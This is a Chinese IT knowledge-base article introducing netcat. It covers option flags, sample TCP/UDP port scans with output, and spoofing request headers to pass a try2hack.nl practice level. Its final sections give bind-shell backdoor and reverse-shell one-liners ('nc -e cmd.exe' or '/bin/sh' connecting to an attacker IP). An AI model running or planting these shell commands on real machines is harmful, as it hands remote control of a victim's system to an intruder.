NOVOTS KMS 词汇表 Glossary    联系我们 Contact Us
查询 Search  
   
按类别浏览 Browse by Category
NOVOTS KMS
 数据库
 网络技术
 JAVA应用服务器
 邮件/群件
 硬件
 其他
 办公软件
 操作系统
 病毒安全
 服务管理
 工具软件
 工作心得
 沟通技巧
NOVOTS KMS .: 病毒安全 .: "瑞士军刀"netcat常用命令介绍

"瑞士军刀"netcat常用命令介绍

1、基本使用
  想要连接到某处: nc [-options] hostname port[s] [ports] ...
  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
  参数:
  -e prog 程序重定向,一旦连接,就执行
  -g gateway source-routing hop point[s], up to 8
  -G num source-routing pointer: 4, 8, 12, ...
  -h 帮助信息
  -i secs 延时的间隔
  -l 监听模式,用于入站连接
  -n 指定数字的IP地址,不能用hostname
  -o file 记录16进制的传输
  -p port 本地端口号
  -r 任意指定本地及远程端口
  -s addr 本地源地址
  -u UDP模式
  -v 详细输出——用两个-v可得到更详细的内容
  -w secs timeout的时间
  -z 将输入输出关掉——用于扫描时
  其中端口号可以指定一个或者用lo-hi式的指定范围。
  例如:扫描端口
  tcp扫描
  C:\nc>nc -v -z -w2 192.168.0.80 1-140
  net [192.168.0.80] 140 (?)
  net [192.168.0.80] 139 (netbios-ssn) open
  net [192.168.0.80] 138 (?)
  net [192.168.0.80] 137 (netbios-ns)
  net [192.168.0.80] 136 (?)
  net [192.168.0.80] 135 (epmap) open
  net [192.168.0.80] 81 (?) open
  net [192.168.0.80] 80 (http) open
  net [192.168.0.80] 79 (finger)
  net [192.168.0.80] 25 (smtp) open
  net [192.168.0.80] 24 (?)
  net [192.168.0.80] 23 (telnet)
  net [192.168.0.80] 21 (ftp)
  udp扫描
  C:\nc>nc -u -v -z -w2 192.168.0.80 1-140
  net [192.168.0.80] 140 (?) open
  net [192.168.0.80] 139 (?) open
  net [192.168.0.80] 138 (netbios-dgm) open
  net [192.168.0.80] 137 (netbios-ns) open
  net [192.168.0.80] 54 (?) open
  net [192.168.0.80] 53 (domain) open
  net [192.168.0.80] 38 (?) open
  net [192.168.0.80] 37 (time) open

  net [192.168.0.80] 7 (echo) open

2、IE的MIME欺骗

  www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点)

  打开这个页面,有http://www.try2hack.nl/cgi-bin /level7.pl页面(这个网站提供了黑客的8关,过了这8关证明你开始入门了),这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft.com/ms.htm重定向链接过去的,有病阿(这是一个题目呀,要慢慢研究),linux有IE6.72? 微软会在它的页面上放http://www.try2hack.nl/cgi-bin/level7.pl的链接?看看页面的源代码,level7.pl 是在服务器端 执行的perl脚本,根本无法看到,还是研究一下IE5和它通信时都告诉了它什么,抓包,我们会发现,我们的IE5告诉对方: 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈,level7.pl这个cgi应该是根据这些信息知道我们不是它要求的 客户,嘿嘿,需要欺骗对方才行,用军刀来可以实现,如下做就可以哄对方了:

  nc www.try2hack.nl 80 [enter]

  GET /cgi-bin/level7.pl HTTP/1.1 [enter]

  Accept: image/gif, image/x-xbitmap, application/msword, */* [enter]

  Refererhttp://www.microsoft.com/ms.htm [enter]

  Accept-Language: zh-cn [enter]

  Accept-Encoding: gzip, deflate [enter]

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; Linux 8.8.8 i986) [enter]

  Host: www.try2hack.nl [enter]

  Connection:

  Keep-Alive [enter]

  注意,如果出现HTTP 400时,说明你输入格式有问题,出现httpd 200回应时,就给出结果了:

3、后门

  victim machine: //受害者的机器

  nc -l -p port -e cmd.exe //win2000

  nc -l -p port -e /bin/sh //unix,linux

  attacker machine: //攻击者的机器.

  nc ip -p port //连接victim_IP,然后得到一个shell。

4、反向连接

  attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.

  //或者wollf的反向连接.

  nc -vv -l -p port

  victim machine:

  nc -e cmd.exe attacker ip -p port

  nc -e /bin/sh attacker ip -p port

文章 4635
创建日期 6-7-2010
作者 yuying
评分 (None)

这篇文章对你多有用?

相关文章

article 网络的常用命令
网络的常用命令一、Ping   ...
(No rating)  2-25-2011    Views: 1936   
article Linux 入门常用命令(一)
1.Linux进入与退出系统...
(No rating)  7-28-2011    Views: 1127   
article windows Server 2008 R2 Server Core常用命令
1.修改计算机名称 工作组:Netdom
  12-22-2012    Views: 1049   

用户评语

添加评语
当前还没有评语.


.: .: .: .: .:
[ 登陆 ]
北京护航科技有限公司 2006

Novots Technologies Limited